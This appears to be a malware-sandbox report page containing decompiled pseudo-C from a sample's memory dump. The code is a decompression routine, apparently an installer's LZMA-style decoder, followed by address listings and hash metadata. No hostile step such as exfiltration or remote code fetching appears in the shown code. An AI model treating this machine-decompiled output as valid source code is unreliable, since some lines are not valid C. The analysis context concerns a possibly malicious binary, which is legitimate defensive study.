                          														 *(__ebp - 0x54) = __esi;
                          														__ax =  *__esi;
                          														__ecx = __ax & 0x0000ffff;
                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          														__eflags =  *(__ebp - 0xc) - __edx;
                          														if( *(__ebp - 0xc) >= __edx) {
                          															__ecx = 0;
                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          															__ecx = 1;
                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          															__ebx = 1;
                          															__ecx =  *(__ebp - 0x48);
                          															__ebx = 1 << __cl;
                          															__ecx = 1 << __cl;
                          															__ebx =  *(__ebp - 0x44);
                          															__ebx =  *(__ebp - 0x44) | __ecx;
                          															__cx = __ax;
                          															__cx = __ax >> 5;
                          															__eax = __eax - __ecx;
                          															__edi = __edi + 1;
                          															__eflags = __edi;
                          															 *(__ebp - 0x44) = __ebx;
                          															 *__esi = __ax;
                          															 *(__ebp - 0x50) = __edi;
                          														} else {
                          															 *(__ebp - 0x10) = __edx;
                          															0x800 = 0x800 - __ecx;
                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          															 *__esi = __dx;
                          														}
                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                          														if( *(__ebp - 0x10) >= 0x1000000) {
                          															L111:
                          															_t368 = __ebp - 0x48;
                          															 *_t368 =  *(__ebp - 0x48) + 1;
                          															__eflags =  *_t368;
                          															goto L112;
                          														} else {
                          															goto L109;
                          														}
                          													}
                          													__ecx =  *(__ebp - 0xc);
                          													__ebx = __ebx + __ebx;
                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													 *(__ebp - 0x44) = __ebx;
                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          														__ecx =  *(__ebp - 0x10);
                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          														__ebx = __ebx | 0x00000001;
                          														__eflags = __ebx;
                          														 *(__ebp - 0x44) = __ebx;
                          													}
                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                          													if( *(__ebp - 0x10) >= 0x1000000) {
                          														L101:
                          														_t338 = __ebp - 0x48;
                          														 *_t338 =  *(__ebp - 0x48) - 1;
                          														__eflags =  *_t338;
                          														goto L102;
                          													} else {
                          														goto L99;
                          													}
                          												}
                          												__edx =  *(__ebp - 4);
                          												__eax = __eax - __ebx;
                          												 *(__ebp - 0x40) = __ecx;
                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          												goto L108;
                          											case 0x1a:
                          												L56:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1a;
                          													goto L170;
                          												}
                          												__ecx =  *(__ebp - 0x68);
                          												__al =  *(__ebp - 0x5c);
                          												__edx =  *(__ebp - 8);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *( *(__ebp - 0x68)) = __al;
                          												__ecx =  *(__ebp - 0x14);
                          												 *(__ecx +  *(__ebp - 8)) = __al;
                          												__eax = __ecx + 1;
                          												__edx = 0;
                          												_t192 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t192;
                          												goto L79;
                          											case 0x1b:
                          												L75:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													 *(__ebp - 0x88) = 0x1b;
                          													goto L170;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t274 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t274;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												_t283 = __ebp - 0x64;
                          												 *_t283 =  *(__ebp - 0x64) - 1;
                          												__eflags =  *_t283;
                          												 *( *(__ebp - 0x68)) = __cl;
                          												L79:
                          												 *(__ebp - 0x14) = __edx;
                          												goto L80;
                          											case 0x1c:
                          												while(1) {
                          													L123:
                          													__eflags =  *(__ebp - 0x64);
                          													if( *(__ebp - 0x64) == 0) {
                          														break;
                          													}
                          													__eax =  *(__ebp - 0x14);
                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          													__eflags = __eax -  *(__ebp - 0x74);
                          													if(__eax >=  *(__ebp - 0x74)) {
                          														__eax = __eax +  *(__ebp - 0x74);
                          														__eflags = __eax;
                          													}
                          													__edx =  *(__ebp - 8);
                          													__cl =  *(__eax + __edx);
                          													__eax =  *(__ebp - 0x14);
                          													 *(__ebp - 0x5c) = __cl;
                          													 *(__eax + __edx) = __cl;
                          													__eax = __eax + 1;
                          													__edx = 0;
                          													_t414 = __eax %  *(__ebp - 0x74);
                          													__eax = __eax /  *(__ebp - 0x74);
                          													__edx = _t414;
                          													__eax =  *(__ebp - 0x68);
                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          													__eflags =  *(__ebp - 0x30);
                          													 *( *(__ebp - 0x68)) = __cl;
                          													 *(__ebp - 0x14) = _t414;
                          													if( *(__ebp - 0x30) > 0) {
                          														continue;
                          													} else {
                          														L80:
                          														 *(__ebp - 0x88) = 2;
                          														goto L1;
                          													}
                          												}
                          												 *(__ebp - 0x88) = 0x1c;
                          												goto L170;
                          										}
                          									}
                          									L171:
                          									_t544 = _t543 | 0xffffffff;
                          									goto L172;
                          								}
                          							}
                          						}
                          					}
                          					goto L1;
                          				}
                          			}














                          0x00000000
                          0x004062eb
                          0x004062eb
                          0x004062ef
                          0x00406310
                          0x00406317
                          0x0040631d
                          0x00406323
                          0x00406335
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x004062f1
                          0x004062f7
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00405ed0
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040604c
                          0x0040604e
                          0x00406051
                          0x004060c2
                          0x004060c5
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00406053
                          0x00406057
                          0x0040605a
                          0x0040605c
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406074
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x00406089
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x00406099
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x00000000
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a4
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00000000
                          0x004060b5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x004060e5
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x00000000
                          0x00406856
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8
                          0x00000000
                          0x004062ef

                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
                          • Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
                          • Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00406409() {
                          				unsigned short _t531;
                          				signed int _t532;
                          				void _t533;
                          				signed int _t534;
                          				signed int _t535;
                          				signed int _t565;
                          				signed int _t568;
                          				signed int _t589;
                          				signed int* _t606;
                          				void* _t613;
                          
                          				L0:
                          				while(1) {
                          					L0:
                          					if( *(_t613 - 0x40) != 0) {
                          						 *(_t613 - 0x84) = 0xb;
                          						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                          						goto L132;
                          					} else {
                          						__eax =  *(__ebp - 0x28);
                          						L88:
                          						 *(__ebp - 0x2c) = __eax;
                          						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          						L89:
                          						__eax =  *(__ebp - 4);
                          						 *(__ebp - 0x80) = 0x15;
                          						__eax =  *(__ebp - 4) + 0xa68;
                          						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          						L69:
                          						 *(__ebp - 0x84) = 0x12;
                          						while(1) {
                          							L132:
                          							 *(_t613 - 0x54) = _t606;
                          							while(1) {
                          								L133:
                          								_t531 =  *_t606;
                          								_t589 = _t531 & 0x0000ffff;
                          								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                          								if( *(_t613 - 0xc) >= _t565) {
                          									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                          									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                          									 *(_t613 - 0x40) = 1;
                          									_t532 = _t531 - (_t531 >> 5);
                          									 *_t606 = _t532;
                          								} else {
                          									 *(_t613 - 0x10) = _t565;
                          									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                          								}
                          								if( *(_t613 - 0x10) >= 0x1000000) {
                          									goto L139;
                          								}
                          								L137:
                          								if( *(_t613 - 0x6c) == 0) {
                          									 *(_t613 - 0x88) = 5;
                          									L170:
                          									_t568 = 0x22;
                          									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                          									_t535 = 0;
                          									L172:
                          									return _t535;
                          								}
                          								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                          								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                          								L139:
                          								_t533 =  *(_t613 - 0x84);
                          								while(1) {
                          									 *(_t613 - 0x88) = _t533;
                          									while(1) {
                          										L1:
                          										_t534 =  *(_t613 - 0x88);
                          										if(_t534 > 0x1c) {
                          											break;
                          										}
                          										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                          											case 0:
                          												if( *(_t613 - 0x6c) == 0) {
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t534 =  *( *(_t613 - 0x70));
                          												if(_t534 > 0xe1) {
                          													goto L171;
                          												}
                          												_t538 = _t534 & 0x000000ff;
                          												_push(0x2d);
                          												asm("cdq");
                          												_pop(_t570);
                          												_push(9);
                          												_pop(_t571);
                          												_t609 = _t538 / _t570;
                          												_t540 = _t538 % _t570 & 0x000000ff;
                          												asm("cdq");
                          												_t604 = _t540 % _t571 & 0x000000ff;
                          												 *(_t613 - 0x3c) = _t604;
                          												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                          												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                          												_t612 = (0x300 << _t604 + _t609) + 0x736;
                          												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                          													L10:
                          													if(_t612 == 0) {
                          														L12:
                          														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                          														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                          														goto L15;
                          													} else {
                          														goto L11;
                          													}
                          													do {
                          														L11:
                          														_t612 = _t612 - 1;
                          														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                          													} while (_t612 != 0);
                          													goto L12;
                          												}
                          												if( *(_t613 - 4) != 0) {
                          													GlobalFree( *(_t613 - 4));
                          												}
                          												_t534 = GlobalAlloc(0x40, 0x600); // executed
                          												 *(_t613 - 4) = _t534;
                          												if(_t534 == 0) {
                          													goto L171;
                          												} else {
                          													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                          													goto L10;
                          												}
                          											case 1:
                          												L13:
                          												__eflags =  *(_t613 - 0x6c);
                          												if( *(_t613 - 0x6c) == 0) {
                          													 *(_t613 - 0x88) = 1;
                          													goto L170;
                          												}
                          												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                          												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                          												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                          												_t45 = _t613 - 0x48;
                          												 *_t45 =  *(_t613 - 0x48) + 1;
                          												__eflags =  *_t45;
                          												L15:
                          												if( *(_t613 - 0x48) < 4) {
                          													goto L13;
                          												}
                          												_t546 =  *(_t613 - 0x40);
                          												if(_t546 ==  *(_t613 - 0x74)) {
                          													L20:
                          													 *(_t613 - 0x48) = 5;
                          													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                          													goto L23;
                          												}
                          												 *(_t613 - 0x74) = _t546;
                          												if( *(_t613 - 8) != 0) {
